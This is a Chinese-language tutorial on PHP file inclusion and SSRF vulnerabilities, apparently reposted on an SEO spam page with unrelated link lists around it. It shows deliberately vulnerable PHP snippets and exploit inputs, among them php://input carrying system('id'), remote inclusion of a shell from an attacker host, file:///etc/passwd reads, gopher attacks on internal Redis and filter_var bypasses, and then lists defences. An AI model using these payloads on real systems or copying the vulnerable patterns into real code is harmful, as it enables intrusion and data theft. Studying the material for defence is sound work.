当前位置: 首页 > wzjs >正文

义乌小商品市场网好看的seo网站

义乌小商品市场网,好看的seo网站,秦皇岛建设网招聘,自己给网站做logo深入理解PHP安全漏洞:文件包含与SSRF攻击全解析 前言 在Web安全领域,PHP应用程序的安全问题一直备受关注。本文将深入探讨两种常见的PHP安全漏洞:文件包含漏洞和服务器端请求伪造(SSRF),帮助开发者理解漏洞原理、利用方式以及防…

深入理解PHP安全漏洞:文件包含与SSRF攻击全解析

前言

在Web安全领域,PHP应用程序的安全问题一直备受关注。本文将深入探讨两种常见的PHP安全漏洞:文件包含漏洞和服务器端请求伪造(SSRF),帮助开发者理解漏洞原理、利用方式以及防御措施。

第一部分:文件包含漏洞详解

什么是文件包含漏洞?

文件包含漏洞是PHP应用程序中常见的安全问题,当开发者使用包含函数引入文件时,如果传入的文件名参数未经严格校验,攻击者就可能利用这个漏洞读取敏感文件甚至执行恶意代码。

危险函数

PHP中有四个主要的文件包含函数:

  • include()
  • include_once()
  • require()
  • require_once()

文件包含漏洞类型

1. 本地文件包含(LFI)

利用方式:

  • 直接读取Flag文件
  • 通过PHP伪协议读取源代码
  • 写入PHP木马获取webshell

示例代码:

<?php
$file = $_GET['file'];
if(file_exists('/home/www/'.$file.'.php')) {include '/home/www/'.$file.'.php';
} else {include '/home/www/'.'home.php';
}
?>

利用方法:

http://www.example.com/demo1.php?file=flag.php%00
2. PHP伪协议利用

常用伪协议:

  1. file:// 协议:
http://www.example.com/index.php?file=file://D:/phpStudy/WWW/flag.txt
  1. php://filter
http://example.com/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
  1. php://input
POST /index.php?file=php://input HTTP/1.1
...
<?php system('id'); ?>
3. 远程文件包含(RFI)

必要条件:

  • allow_url_fopen = On
  • allow_url_include = On

示例代码:

<?php
$basePath = @$_GET['param'];
require_once $basePath.'/action/m_share.php';
?>

利用方法:

http://www.example.com/demo4.php?param=http://www.xx.com/attacker/PHPshell.txt?

防御措施

  1. 白名单验证
  2. 禁用危险配置:
    allow_url_fopen = Off
    allow_url_include = Off
    
  3. 设置open_basedir
  4. 严格校验用户输入
  5. 避免动态包含

第二部分:SSRF漏洞深入解析

什么是SSRF?

SSRF(Server-Side Request Forgery)是一种由攻击者构造形成由服务端发起请求的安全漏洞。攻击者可以利用此漏洞访问外网无法访问的内部系统。

常见危险函数

  1. file_get_contents()
<?php
if (isset($_POST['url'])) {$content = file_get_contents($_POST['url']);$filename = '/images/'.rand().'img1.jpg';file_put_contents($filename, $content);echo $_POST['url'];$img = "<img src=\"".$filename."\"/>";echo $img;
}
?>
  1. fsockopen()
<?php
function GetFile($host, $port, $link) {$fp = fsockopen($host, intval($port), $errno, $errstr, 30);if (!$fp) {echo "$errstr (error number $errno) \n";} else {$out = "GET $link HTTP/1.1\r\n";$out .= "Host: $host\r\n";$out .= "Connection: Close\r\n\r\n";$out .= "\r\n";fwrite($fp, $out);$contents = '';while (!feof($fp)) {$contents .= fgets($fp, 1024);}fclose($fp);return $contents;}
}
?>
  1. curl_exec()
<?php
if (isset($_POST['url'])) {$link = $_POST['url'];$curlobj = curl_init();curl_setopt($curlobj, CURLOPT_POST, 0);curl_setopt($curlobj, CURLOPT_URL,$link);curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);$result = curl_exec($curlobj);curl_close($curlobj);$filename = './curled/'.rand().'.txt';file_put_contents($filename, $result);echo $result;
}
?>

SSRF绕过技巧

1. IP编码绕过
  • 使用xip.io域名:
    10.0.0.1.xip.io
    
  • IP转换为10进制
2. 协议变换
  • Dict协议:
    dict://192.168.1.1:8080/test:dict
    
  • Gopher协议:
    gopher://192.168.1.1/gopher
    
  • File协议:
    file:///etc/passwd
    
3. Gopher协议高级利用

Gopher协议可以攻击内网的多种服务:

  • FTP
  • Telnet
  • Redis
  • Memcache

Redis攻击示例:

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
?>
4. filter_var()绕过
<?php
$url = $_GET['url'];
echo "Argument: ".$url. "\n";
if(filter_var($url, FILTER_VALIDATE_URL)) {$r = parse_url($url);var_dump($r);if (preg_match('/skysec\.top$/', $r['host'])) {exec("curl -v -s ".$r['host']."", $a);} else {echo "Error: Host not allowed";}
} else {echo "Error: Invalid URL";
}
?>

绕过方法:

http://example.com/test.php?url=0://192.168.1.1.com:8080;skysec.top:80/
5. 30x跳转绕过
<?php
$url = $_GET['url'];
print $url;
curl($url);
function curl($url) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_exec($ch);curl_close($ch);
}

防御SSRF的最佳实践

  1. 限制协议:只允许HTTP和HTTPS
  2. 禁止访问内网IP
  3. 设置URL白名单
  4. 禁用CURLOPT_FOLLOWLOCATION
  5. 使用DNS解析结果校验
  6. 过滤返回信息

结语

文件包含和SSRF漏洞都可能对Web应用造成严重威胁。作为开发者,理解这些漏洞的原理和利用方式,才能更好地防御它们。安全是一个持续的过程,需要开发者保持警惕并不断更新知识。

免责声明:本文所有技术内容仅用于教育目的和安全研究,未经授权对他人系统进行测试属于违法行为。

http://www.dtcms.com/wzjs/499604.html

相关文章:

  • 杭州做网站 做小程序西安网站制作工作室
  • 做网站开发平台深圳谷歌推广公司
  • 福建建设厅网站工程履约保险宁德市蕉城区
  • wordpress百度云cdn郑州seo优化公司
  • 芜湖 网站建设百度的网址是什么呢
  • 温州做企业网站阿森纳英超积分
  • 有机蔬菜网站是如何建设互联网域名注册查询
  • 论坛类网站建设福州关键词快速排名
  • 做招牌的网站云南seo
  • 个人网站设计论文道客巴巴百度贴吧网页版入口
  • 建app需要多少钱天津seo实战培训
  • 在线网站做气泡图关键词在线挖掘网站
  • 合肥专业网站建设公司哪家好广州最新疫情最新消息
  • 一起做网店网站官方郑州高端网站建设
  • 广州省建设监理协会网站市场推广方案怎么做
  • 做旅游网站用什么颜色b2b网站免费推广
  • 淘乐惠网站怎么做河南公司网站建设
  • 酒店设计网站推荐泰安做百度推广的公司
  • 专业网站建设收费如何优化搜索关键词
  • 广州做网站如何舆情监测软件
  • 建网站的优势aso关键词搜索优化
  • 信息网站建设网站指数查询
  • 动态ppt模板下载免费完整版seo学校培训班
  • 兴仁县城乡建设局网站成都网站建设方案优化
  • 海阳网站建设提交链接
  • 网站开发图网络舆情监测中心
  • 响应式建网站shodan搜索引擎
  • 新闻网站建设方案书怎么写关键词快速排名平台
  • 建立什么网站可以赚钱线上推广平台
  • 做 英语试题的网站清远今日头条新闻